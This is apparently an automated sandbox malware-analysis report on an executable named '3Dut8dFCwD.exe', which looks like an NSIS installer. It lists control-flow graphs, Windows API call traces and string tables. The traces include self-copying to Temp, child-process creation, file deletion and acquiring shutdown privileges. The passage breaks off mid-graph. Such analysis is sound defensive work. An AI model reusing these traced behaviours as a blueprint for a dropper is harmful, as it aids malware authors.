GetDlgItem 4444->4446 4451 40417e 4444->4451 4448 403fe3 SetWindowPos 4445->4448 4449 403ff6 4445->4449 4450 4044b3 22 API calls 4446->4450 4447 4041d8 4452 4044ff SendMessageW 4447->4452 4460 404128 4447->4460 4448->4449 4453 404041 4449->4453 4454 403fff ShowWindow 4449->4454 4455 404168 SetClassLongW 4450->4455 4451->4447 4459 401389 2 API calls 4451->4459 4482 4041ea 4452->4482 4456 404060 4453->4456 4457 404049 DestroyWindow 4453->4457 4461 4040eb 4454->4461 4462 40401f GetWindowLongW 4454->4462 4458 40140b 2 API calls 4455->4458 4464 404065 SetWindowLongW 4456->4464 4465 404076 4456->4465 4463 40443c 4457->4463 4458->4451 4466 4041b0 4459->4466 4467 40451a 8 API calls 4461->4467 4462->4461 4468 404038 ShowWindow 4462->4468 4463->4460 4475 40446d ShowWindow 4463->4475 4464->4460 4465->4461 4469 404082 GetDlgItem 4465->4469 4466->4447 4470 4041b4 SendMessageW 4466->4470 4467->4460 4468->4453 4473 4040b0 4469->4473 4474 404093 SendMessageW IsWindowEnabled 4469->4474 4470->4460 4471 40140b 2 API calls 4471->4482 4472 40443e DestroyWindow EndDialog 4472->4463 4477 4040bd 4473->4477 4480 404104 SendMessageW 4473->4480 4481 4040d0 4473->4481 4487 4040b5 4473->4487 4474->4460 4474->4473 4475->4460 4476 406571 21 API calls 4476->4482 4477->4480 4477->4487 4478 40448c SendMessageW 4478->4461 4479 4044b3 22 API calls 4479->4482 4480->4461 4483 4040d8 4481->4483 4484 4040ed 4481->4484 4482->4460 4482->4471 4482->4472 4482->4476 4482->4479 4488 4044b3 22 API calls 4482->4488 4504 40437e DestroyWindow 4482->4504 4486 40140b 2 API calls 4483->4486 4485 40140b 2 API calls 4484->4485 4485->4487 4486->4487 4487->4461 4487->4478 4489 404265 GetDlgItem 4488->4489 4490 404282 ShowWindow EnableWindow 4489->4490 4491 40427a 4489->4491 4513 4044d5 EnableWindow 4490->4513 4491->4490 4493 4042ac EnableWindow 4498 4042c0 4493->4498 4494 4042c5 GetSystemMenu EnableMenuItem SendMessageW 4495 4042f5 SendMessageW 4494->4495 4494->4498 4495->4498 4497 403f95 22 API calls 4497->4498 4498->4494 4498->4497 4514 4044e8 SendMessageW 4498->4514 4515 406534 lstrcpynW 4498->4515 4500 404324 lstrlenW 4501 406571 21 API calls 4500->4501 4502 40433a SetWindowTextW 4501->4502 4503 401389 2 API calls 4502->4503 4503->4482 4504->4463 4505 404398 CreateDialogParamW 4504->4505 4505->4463 4506 4043cb 4505->4506 4507 4044b3 22 API calls 4506->4507 4508 4043d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4507->4508 4509 401389 2 API calls 4508->4509 4510 40441c 4509->4510 4510->4460 4511 404424 ShowWindow 4510->4511 4512 4044ff SendMessageW 4511->4512 4512->4463 4513->4493 4514->4498 4515->4500 4516 401a35 4517 402dab 21 API calls 4516->4517 4518 401a3e ExpandEnvironmentStringsW 4517->4518 4519 401a52 4518->4519 4521 401a65 4518->4521 4520 401a57 lstrcmpW 4519->4520 4519->4521 4520->4521 4527 4023b7 4528 4023c5 4527->4528 4529 4023bf 4527->4529 4531 402dab 21 API calls 4528->4531 4533 4023d3 4528->4533 4530 402dab 21 API calls 4529->4530 4530->4528 4531->4533 4532 4023e1 4535 402dab 21 API calls 4532->4535 4533->4532 4534 402dab 21 API calls 4533->4534 4534->4532 4536 4023ea WritePrivateProfileStringW 4535->4536 4537 4014b8 4538 4014be 4537->4538 4539 401389 2 API calls 4538->4539 4540 4014c6 4539->4540 4541 402439 4542 402441 4541->4542 4543 40246c 4541->4543 4544 402deb 21 API calls 4542->4544 4545 402dab 21 API calls 4543->4545 4547 402448 4544->4547 4546 402473 4545->4546 4552 402e69 4546->4552 4549 402480 4547->4549 4550 402dab 21 API calls 4547->4550 4551 402459 RegDeleteValueW RegCloseKey 4550->4551 4551->4549 4553 402e76 4552->4553 4554 402e7d 4552->4554 4553->4549 4554->4553 4556 402eae 4554->4556 4557 4063a1 RegOpenKeyExW 4556->4557 4558 402edc 4557->4558 4559 402eec RegEnumValueW 4558->4559 4566 402f0f 4558->4566 4567 402f86 4558->4567 4560 402f76 RegCloseKey 4559->4560 4559->4566 4560->4567 4561 402f4b RegEnumKeyW 4562 402f54 RegCloseKey 4561->4562 4561->4566 4563 406928 5 API calls 4562->4563 4565 402f64 4563->4565 4564 402eae 6 API calls 4564->4566 4565->4567 4568 402f68 RegDeleteKeyW 4565->4568 4566->4560 4566->4561 4566->4562 4566->4564 4567->4553 4568->4567 4569 40173a 4570 402dab 21 API calls 4569->4570 4571 401741 SearchPathW 4570->4571 4572 40175c 4571->4572 4573 401d3d 4574 402d89 21 API calls 4573->4574 4575 401d44 4574->4575 4576 402d89 21 API calls 4575->4576 4577 401d50 GetDlgItem 4576->4577 4578 40263d 4577->4578

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 40350f-403561 SetErrorMode GetVersionExW 1 403563-403593 GetVersionExW 0->1 2 40359b-4035a0 0->2 1->2 3 4035a2 2->3 4 4035a8-4035ea 2->4 3->4 5 4035ec-4035f4 call 406928 4->5 6 4035fd 4->6 5->6 12 4035f6 5->12 7 403602-403616 call 4068b8 lstrlenA 6->7 13 403618-403634 call 406928 * 3 7->13 12->6 20 403645-4036a9 #17 OleInitialize SHGetFileInfoW call 406534 GetCommandLineW call 406534 13->20 21 403636-40363c 13->21 28 4036b2-4036c6 call 405e30 CharNextW 20->28 29 4036ab-4036ad 20->29 21->20 26 40363e 21->26 26->20 32 4037c1-4037c7 28->32 29->28 33 4036cb-4036d1 32->33 34 4037cd 32->34 36 4036d3-4036d8 33->36 37 4036da-4036e1 33->37 35 4037e1-4037fb GetTempPathW call 4034de 34->35 44 403853-40386d DeleteFileW call 403082 35->44 45 4037fd-40381b GetWindowsDirectoryW lstrcatW call 4034de 35->45 36->36 36->37 39 4036e3-4036e8 37->39 40 4036e9-4036ed 37->40 39->40 42 4036f3-4036f9 40->42 43 4037ae-4037bd call 405e30 40->43 47 403713-40374c 42->47 48 4036fb-403702 42->48 43->32 61 4037bf-4037c0 43->61 66 403873-403879 44->66 67 403a5a-403a6a ExitProcess OleUninitialize 44->67 45->44 64 40381d-40384d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034de 45->64 51 403769-4037a3 47->51 52 40374e-403753 47->52 49 403704-403707 48->49 50 403709 48->50 49->47 49->50 50->47 58 4037a5-4037a9 51->58 59 4037ab-4037ad 51->59 52->51 56 403755-40375d 52->56 62 403764 56->62 63 40375f-403762 56->63 58->59 65 4037cf-4037dc call 406534 58->65 59->43 61->32 62->51 63->51 63->62 64->44 64->67 65->35 72 403912-403919 call 403c06 66->72 73 40387f-40388a call 405e30 66->73 70 403a90-403a96 67->70 71 403a6c-403a7c call 405b94 ExitProcess 67->71 75 403b14-403b1c 70->75 76 403a98-403aae GetCurrentProcess OpenProcessToken 70->76 83 40391e-403922 72->83 87 4038d8-4038e2 73->87 88 40388c-4038c1 73->88 84 403b22-403b26 ExitProcess 75->84 85 403b1e 75->85 81 403ab0-403ade LookupPrivilegeValueW AdjustTokenPrivileges 76->81 82 403ae4-403af2 call 406928 76->82 81->82 97 403b00-403b0b ExitWindowsEx 82->97 98 403af4-403afe 82->98 83->67 85->84 92 4038e4-4038f2 call 405f0b 87->92 93 403927-40394d call 405aff lstrlenW call 406534 87->93 90 4038c3-4038c7 88->90 94 4038d0-4038d4 90->94 95 4038c9-4038ce 90->95 92->67 107 4038f8-40390e call 406534 * 2 92->107 110 40395e-403976 93->110 111 40394f-403959 call 406534 93->111 94->90 100 4038d6 94->100 95->94 95->100 97->75 102 403b0d-403b0f call 40140b 97->102 98->97 98->102 100->87 102->75 107->72 114 40397b-40397f 110->114 111->110 116 403984-4039ae wsprintfW call 406571 114->116 120 4039b0-4039b5 call 405a88 116->120 121 4039b7 call 405ae2 116->121 125 4039bc-4039be 120->125 121->125 126 4039c0-4039ca GetFileAttributesW 125->126 127 4039fa-403a19 SetCurrentDirectoryW call 4062f4 CopyFileW 125->127 128 4039eb-4039f6 126->128 129 4039cc-4039d5 DeleteFileW 126->129 135 403a58 127->135 136 403a1b-403a3c call 4062f4 call 406571 call 405b17 127->136 128->114 132 4039f8 128->132 129->128 131 4039d7-4039e9 call 405c40 129->131 131->116 131->128 132->67 135->67 144 403a82-403a8e CloseHandle 136->144 145 403a3e-403a48 136->145 144->135 145->135 146 403a4a-403a52 call 406891 145->146 146->116 146->135
                              APIs
                              • SetErrorMode.KERNELBASE ref: 00403532
                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040355D
                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403570
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403609
                              • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403646
                              • OleInitialize.OLE32(00000000), ref: 0040364D
                              • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040366C
                              • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403681
                              • CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036BA
                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F2
                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403803
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040380F
                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040382B
                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040383C
                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403844
                              • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403858
                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403931
                                • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                              • wsprintfW.USER32 ref: 0040398E
                              • GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039C1
                              • DeleteFileW.KERNEL32(007AB800), ref: 004039CD
                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039FB
                                • Part of subcall function 004062F4: MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\3Dut8dFCwD.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A11
                                • Part of subcall function 00405B17: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B40
                                • Part of subcall function 00405B17: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B4D
                                • Part of subcall function 00406891: FindFirstFileW.KERNELBASE(75923420,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
                                • Part of subcall function 00406891: FindClose.KERNEL32(00000000), ref: 004068A8
                              • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5A
                              • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5F
                              • ExitProcess.KERNEL32 ref: 00403A7C
                              • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403A83
                              • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A9F
                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AA6
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ABB
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ADE
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B03
                              • ExitProcess.KERNEL32 ref: 00403B26
                                • Part of subcall function 00405AE2: CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\3Dut8dFCwD.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                              • API String ID: 2017177436-3207634299
                              • Opcode ID: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
                              • Instruction ID: 67d79b026de4563afcf96275ffa6c79ee12181f10d5245d5b23545884d7a86e1
                              • Opcode Fuzzy Hash: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
                              • Instruction Fuzzy Hash: FCF1F570604301ABD720AF659D05B6B7EE8EF81B06F10443EF581B62D1DB7D8A45CB6E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 289 405c40-405c66 call 405f0b 292 405c68-405c7a DeleteFileW 289->292 293 405c7f-405c86 289->293 294 405dfc-405e00 292->294 295 405c88-405c8a 293->295 296 405c99-405ca9 call 406534 293->296 297 405c90-405c93 295->297 298 405daa-405daf 295->298 302 405cb8-405cb9 call 405e4f 296->302 303 405cab-405cb6 lstrcatW 296->303 297->296 297->298 298->294 301 405db1-405db4 298->301 304 405db6-405dbc 301->304 305 405dbe-405dc6 call 406891 301->305 306 405cbe-405cc2 302->306 303->306 304->294 305->294 312 405dc8-405ddc call 405e03 call 405bf8 305->312 310 405cc4-405ccc 306->310 311 405cce-405cd4 lstrcatW 306->311 310->311 313 405cd9-405cf5 lstrlenW FindFirstFileW 310->313 311->313 329 405df4-405df7 call 4055b9 312->329 330 405dde-405de1 312->330 314 405cfb-405d03 313->314 315 405d9f-405da3 313->315 317 405d23-405d37 call 406534 314->317 318 405d05-405d0d 314->318 315->298 320 405da5 315->320 331 405d39-405d41 317->331 332 405d4e-405d59 call 405bf8 317->332 321 405d82-405d92 FindNextFileW 318->321 322 405d0f-405d17 318->322 320->298 321->314 328 405d98-405d99 FindClose 321->328 322->317 325 405d19-405d21 322->325 325->317 325->321 328->315 329->294 330->304 333 405de3-405df2 call 4055b9 call 4062f4 330->333 331->321 334 405d43-405d4c call 405c40 331->334 342 405d7a-405d7d call 4055b9 332->342 343 405d5b-405d5e 332->343 333->294 334->321 342->321 346 405d60-405d70 call 4055b9 call 4062f4 343->346 347 405d72-405d78 343->347 346->321 347->321
                              APIs
                              • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C69
                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,\*.*), ref: 00405CB1
                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CD4
                              • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CDA
                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CEA
                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D8A
                              • FindClose.KERNEL32(00000000), ref: 00405D99
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\*.*$\*.*
                              • API String ID: 2035342205-3418915113
                              • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                              • Instruction ID: 81bbe464494fb05f5b6ac6ef540245f59b5aaf372d852028a7707812675e6212
                              • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                              • Instruction Fuzzy Hash: 7C419230805A14B6DB216B658D4DBBF7678EF81714F10813FF841B11D1DB7C4A829E6E
                              APIs
                              • FindFirstFileW.KERNELBASE(75923420,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
                              • FindClose.KERNEL32(00000000), ref: 004068A8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                              • Instruction ID: e6b866c1dacf5e46d4e55f169e1c72a585861dd5ed209923aafe0abde5973ea2
                              • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                              • Instruction Fuzzy Hash: 9BD012325161205BD29127386D0C85B7A9CAF563317129B36F46AF22E0C7748C628698

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 149 403c06-403c1e call 406928 152 403c20-403c2b GetUserDefaultUILanguage call 40647b 149->152 153 403c32-403c69 call 406402 149->153 156 403c30 152->156 159 403c81-403c87 lstrcatW 153->159 160 403c6b-403c7c call 406402 153->160 158 403c8c-403cb5 call 403edc call 405f0b 156->158 166 403d47-403d4f call 405f0b 158->166 167 403cbb-403cc0 158->167 159->158 160->159 173 403d51-403d58 call 406571 166->173 174 403d5d-403d82 LoadImageW 166->174 167->166 169 403cc6-403cee call 406402 167->169 169->166 175 403cf0-403cf4 169->175 173->174 177 403e03-403e0b call 40140b 174->177 178 403d84-403db4 RegisterClassW 174->178 179 403d06-403d12 lstrlenW 175->179 180 403cf6-403d03 call 405e30 175->180 191 403e15-403e20 call 403edc 177->191 192 403e0d-403e10 177->192 181 403ed2 178->181 182 403dba-403dfe SystemParametersInfoW CreateWindowExW 178->182 186 403d14-403d22 lstrcmpiW 179->186 187 403d3a-403d42 call 405e03 call 406534 179->187 180->179 185 403ed4-403edb 181->185 182->177 186->187 190 403d24-403d2e GetFileAttributesW 186->190 187->166 194 403d30-403d32 190->194 195 403d34-403d35 call 405e4f 190->195 201 403e26-403e40 ShowWindow call 4068b8 191->201 202 403ea9-403eb1 call 40568c 191->202 192->185 194->187 194->195 195->187 207 403e42-403e47 call 4068b8 201->207 208 403e4c-403e5e GetClassInfoW 201->208 209 403eb3-403eb9 202->209 210 403ecb-403ecd call 40140b 202->210 207->208 213 403e60-403e70 GetClassInfoW RegisterClassW 208->213 214 403e76-403ea7 DialogBoxParamW call 40140b call 403b56 208->214 209->192 215 403ebf-403ec6 call 40140b 209->215 210->181 213->214 214->185 215->192
                              APIs
                                • Part of subcall function 00406928: GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
                                • Part of subcall function 00406928: GetProcAddress.KERNEL32(00000000,?), ref: 00406955
                              • GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C20
                                • Part of subcall function 0040647B: wsprintfW.USER32 ref: 00406488
                              • lstrcatW.KERNEL32(1033,007A1748), ref: 00403C87
                              • lstrlenW.KERNEL32(007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75923420), ref: 00403D07
                              • lstrcmpiW.KERNEL32(007A61F8,.exe,007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D1A
                              • GetFileAttributesW.KERNEL32(007A6200), ref: 00403D25
                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D6E
                              • RegisterClassW.USER32(007A7200), ref: 00403DAB
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC3
                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DF8
                              • ShowWindow.USER32(00000005,00000000), ref: 00403E2E
                              • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E5A
                              • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E67
                              • RegisterClassW.USER32(007A7200), ref: 00403E70
                              • DialogBoxParamW.USER32(?,00000000,00403FB4,00000000), ref: 00403E8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                              • API String ID: 606308-1629884446
                              • Opcode ID: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
                              • Instruction ID: e3f36f251999893233d50a16806d3669fe4950a37a4839b1d492828efc6e8aed
                              • Opcode Fuzzy Hash: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
                              • Instruction Fuzzy Hash: 3061C470100600AAE720AF66DD45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 222 403082-4030d0 GetTickCount GetModuleFileNameW call 406024 225 4030d2-4030d7 222->225 226 4030dc-40310a call 406534 call 405e4f call 406534 GetFileSize 222->226 227 4032b2-4032b6 225->227 234 403110 226->234 235 4031f5-403203 call 40301e 226->235 236 403115-40312c 234->236 241 403205-403208 235->241 242 403258-40325d 235->242 239 403130-403139 call 4034b1 236->239 240 40312e 236->240 248 40325f-403267 call 40301e 239->248 249 40313f-403146 239->249 240->239 244 40320a-403222 call 4034c7 call 4034b1 241->244 245 40322c-403256 GlobalAlloc call 4034c7 call 4032b9 241->245 242->227 244->242 268 403224-40322a 244->268 245->242 273 403269-40327a 245->273 248->242 252 4031c2-4031c6 249->252 253 403148-40315c call 405fdf 249->253 258 4031d0-4031d6 252->258 259 4031c8-4031cf call 40301e 252->259 253->258 271 40315e-403165 253->271 264 4031e5-4031ed 258->264 265 4031d8-4031e2 call 406a15 258->265 259->258 264->236 272 4031f3 264->272 265->264 268->242 268->245 271->258 277 403167-40316e 271->277 272->235 274 403282-403287 273->274 275 40327c 273->275 278 403288-40328e 274->278 275->274 277->258 279 403170-403177 277->279 278->278 280 403290-4032ab SetFilePointer call 405fdf 278->280 279->258 281 403179-403180 279->281 285 4032b0 280->285 281->258 283 403182-4031a2 281->283 283->242 284 4031a8-4031ac 283->284 286 4031b4-4031bc 284->286 287 4031ae-4031b2 284->287 285->227 286->258 288 